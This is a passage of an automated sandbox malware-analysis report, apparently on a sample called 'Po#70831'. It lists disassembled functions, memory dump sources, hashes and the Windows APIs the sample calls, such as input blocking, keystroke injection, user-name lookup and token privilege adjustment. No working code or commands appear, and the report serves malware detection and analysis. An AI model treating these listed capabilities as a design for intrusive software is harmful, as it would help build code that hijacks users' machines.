                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: ea278e3229e48b92e5f9685d8a465490be402b96b5a6d2a27b2d721646ae8d83
                                      • Instruction ID: 9013c7b95ca7ee70e6c8aab2cd8dba166ac954fb822173ac171010ad75e0097a
                                      • Opcode Fuzzy Hash: ea278e3229e48b92e5f9685d8a465490be402b96b5a6d2a27b2d721646ae8d83
                                      • Instruction Fuzzy Hash: 64E0B631000548ABCF21AF55DD0AA993F6DEFA2795B108819FC058A223CB39DD56EB98
                                      Function 004CC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /
                                      • API String ID: 0-2043925204
                                      • Opcode ID: f39f1be015005ed8c3a04619f47617c0789f935fe1343c7c3d2bc55ad2a6f180
                                      • Instruction ID: f2dcc027977c4166394ffa374813e407c3f86c7d7fc28b64e0ad9b46b3324269
                                      • Opcode Fuzzy Hash: f39f1be015005ed8c3a04619f47617c0789f935fe1343c7c3d2bc55ad2a6f180
                                      • Instruction Fuzzy Hash: 77414B7A9002186FCB249FB9DC88FBB77B8EB84314F1041AEF909C7290E6749D41CB58
                                      Function 004ED27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 004ED28C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID: X64
                                      • API String ID: 2645101109-893830106
                                      • Opcode ID: eb4e12b35123dc19fddb870fd68d3fde7fa0f6ff34774208092c3e0d2bd427f9
                                      • Instruction ID: 400ca0b0e1bbe5ed0b2c14b2858140109923b73aabefed2632dcbb3935cbf35e
                                      • Opcode Fuzzy Hash: eb4e12b35123dc19fddb870fd68d3fde7fa0f6ff34774208092c3e0d2bd427f9
                                      • Instruction Fuzzy Hash: F4D0C9B4C0511DEACB90CB90DC8CDDDB77CBB15305F100192F106A2000D734954A9F10
                                      Function 004BCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                      • Instruction ID: ef3a676e6c444beca476707e7e6a0c59b0928173cc19af5541818715a0c65237
                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                      • Instruction Fuzzy Hash: D1022C71E002199BDF14CFA9C9C06EEBBF1EF58314F25816AD819EB384D734AA418B94
                                      Function 0049CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Variable is not of type 'Object'.$p#V
                                      • API String ID: 0-3554362348
                                      • Opcode ID: 4f683836e70b6663d7c922968dcb6e59a81f0749c100dbb77cb0cbda8e08919e
                                      • Instruction ID: 0e7f0ddac32c359fa7436d603f2f6a365984f37cb77d296ddb1e3088acd842f4
                                      • Opcode Fuzzy Hash: 4f683836e70b6663d7c922968dcb6e59a81f0749c100dbb77cb0cbda8e08919e
                                      • Instruction Fuzzy Hash: 6C32AF30900218DBDF14DF95D884AEEBBB5FF15308F10406BE816AB382D779AE46CB59
                                      Function 005068EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00506918
                                      • FindClose.KERNEL32(00000000), ref: 00506961
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 87d3c8b465a5c7843818af108a7b31f052c26ad90b116bd94de792d37f40e380
                                      • Instruction ID: 9a33ba4fd7933c86af47649f0ec132ab294c329b4320d7a153db630a74e3e4e0
                                      • Opcode Fuzzy Hash: 87d3c8b465a5c7843818af108a7b31f052c26ad90b116bd94de792d37f40e380
                                      • Instruction Fuzzy Hash: DB1190356042019FC710DF2AD484A1ABBE5FF85328F14C6ADF4698F6A2CB34EC05CB91
                                      Function 005037B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00514891,?,?,00000035,?), ref: 005037E4
                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00514891,?,?,00000035,?), ref: 005037F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 8d54995741464f911ab05a11123f4fd4ce499cb83b54bd10f7703082f4121878
                                      • Instruction ID: c01b32c971c33919d396e214cfa0fa3a5ef85f4d1a8b552130e2c6834789ce4a
                                      • Opcode Fuzzy Hash: 8d54995741464f911ab05a11123f4fd4ce499cb83b54bd10f7703082f4121878
                                      • Instruction Fuzzy Hash: C7F0EC706042146AE72057668C4DFDF3E5DEFC5765F00057AF505D22D1D9605D08C6B0
                                      Function 004FB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004FB25D
                                      • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 004FB270
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: InputSendkeybd_event
                                      • String ID:
                                      • API String ID: 3536248340-0
                                      • Opcode ID: 4e833de77a3d4711b1755c121310f364bea65f145c3efc18be2c565d34a443a0
                                      • Instruction ID: f30ef02cb8219e62e96d464c2ad45b62e639e98293af9e500c1edf6c2f58d1e7
                                      • Opcode Fuzzy Hash: 4e833de77a3d4711b1755c121310f364bea65f145c3efc18be2c565d34a443a0
                                      • Instruction Fuzzy Hash: 6DF0F97190424DABDB159FA0C805BBE7FB4FF05305F14804AE955A5192C37986169F94
                                      Function 004F10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004F11FC), ref: 004F10D4
                                      • CloseHandle.KERNEL32(?,?,004F11FC), ref: 004F10E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      • Opcode ID: 9016ed9825cd0d4b52ccd0357080f5ab48a6a5e6743b2a8294dcb8be1f38ed8f
                                      • Instruction ID: 5a03b68ca29262f2232c50617af01d575c0268000b6ed38690f967c16989dc3c
                                      • Opcode Fuzzy Hash: 9016ed9825cd0d4b52ccd0357080f5ab48a6a5e6743b2a8294dcb8be1f38ed8f
                                      • Instruction Fuzzy Hash: 1BE04831004600EEE7351B51FC05E777BE9EF15314B10882EF55580471DB626C95DB54
                                      Function 004C676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004C6766,?,?,00000008,?,?,004CFEFE,00000000), ref: 004C6998
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 5a7cf0c154d946735f83cf2397c0511d52bb134559a8caa6745f920550e8ac20
                                      • Instruction ID: 06fd08c2519b70d51e50aa342cfe89490525bcb00877583d6cb7137764428339
                                      • Opcode Fuzzy Hash: 5a7cf0c154d946735f83cf2397c0511d52bb134559a8caa6745f920550e8ac20
                                      • Instruction Fuzzy Hash: BDB14A796106089FD754CF28C486B657BA0FF45364F26C65DE89ACF2A2C33AD982CB44
                                      Function 004AB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 12c365ec22d0c332d0caad1039b4e046a3df13995d940bcb521cfd6e270703ed
                                      • Instruction ID: 76deb80740dc057cefebfa534c164a807b9c6f39c1abd89b05d7d91b986b3909
                                      • Opcode Fuzzy Hash: 12c365ec22d0c332d0caad1039b4e046a3df13995d940bcb521cfd6e270703ed
                                      • Instruction Fuzzy Hash: CF125E719002299BCF14CF59C8806EEB7B5FF59310F14819AE849EB256EB389E81CF95
                                      Function 0050EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 0050EABD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: 0cada548006073006aad7502156c3432f6d03311b0844583b61960faa7b6f712
                                      • Instruction ID: 675495dcb2a936eb462c458521804d8a87ec9b5abab1d95bbd76c812c4ed07ca
                                      • Opcode Fuzzy Hash: 0cada548006073006aad7502156c3432f6d03311b0844583b61960faa7b6f712
                                      • Instruction Fuzzy Hash: EDE012312002049FC710DF5AD445D5ABBD9BF59764F10842AFC49C7291D674A8418B90
                                      Function 004B09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,004B03EE), ref: 004B09DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: b751745220646061a3da47a228b72aa69599afd51db6f97cf5b5d4f833e94cbe
                                      • Instruction ID: 86866bcd27794a9dfd992715902bb34f6de5c880d18b0b07013e54188fd83e61
                                      • Opcode Fuzzy Hash: b751745220646061a3da47a228b72aa69599afd51db6f97cf5b5d4f833e94cbe
                                      • Instruction Fuzzy Hash:
                                      Function 004B781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                      • Instruction ID: 8cba887da43d195bb7a76150673a0dcb0a5280ef0a8845d3f340761bf95f688b
                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                      • Instruction Fuzzy Hash: B85169A160C7055BEB386669889A7FF27999BD2344F18090FD882D7382C61DDE06D37E
                                      Function 00502046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0&V
                                      • API String ID: 0-2600225639
                                      • Opcode ID: 967a57cdb8f2df0cd552509ed89c5e00ba491da0c3bc93cdd5f084b68f56eedf
                                      • Instruction ID: f9371852121fedec09ed66cff0d0092aee3093fe689d44a1db6a927efef16250
                                      • Opcode Fuzzy Hash: 967a57cdb8f2df0cd552509ed89c5e00ba491da0c3bc93cdd5f084b68f56eedf
                                      • Instruction Fuzzy Hash: 2621E7326206118BD728CF79C82767E77E5B764310F148A2EE4A7C33D0DE79A904DB80
                                      Function 004C6DD9 Relevance: .6, Instructions: 637COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f1d4d5fe28b2b6c98a95565bb733d8dc5c73cfecb772b050c7a7ed3be1f28674
                                      • Instruction ID: 8a798d9d6091e077ddfc1757d0bb7bad86cb84fe4389be14ad2ccac492b5288c
                                      • Opcode Fuzzy Hash: f1d4d5fe28b2b6c98a95565bb733d8dc5c73cfecb772b050c7a7ed3be1f28674
                                      • Instruction Fuzzy Hash: 1F325236D29F014ED7639634D822336A64CAFB73C5F14D73BE81AB5EA6EB28C4835504
                                      Function 004ACC39 Relevance: .6, Instructions: 635COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
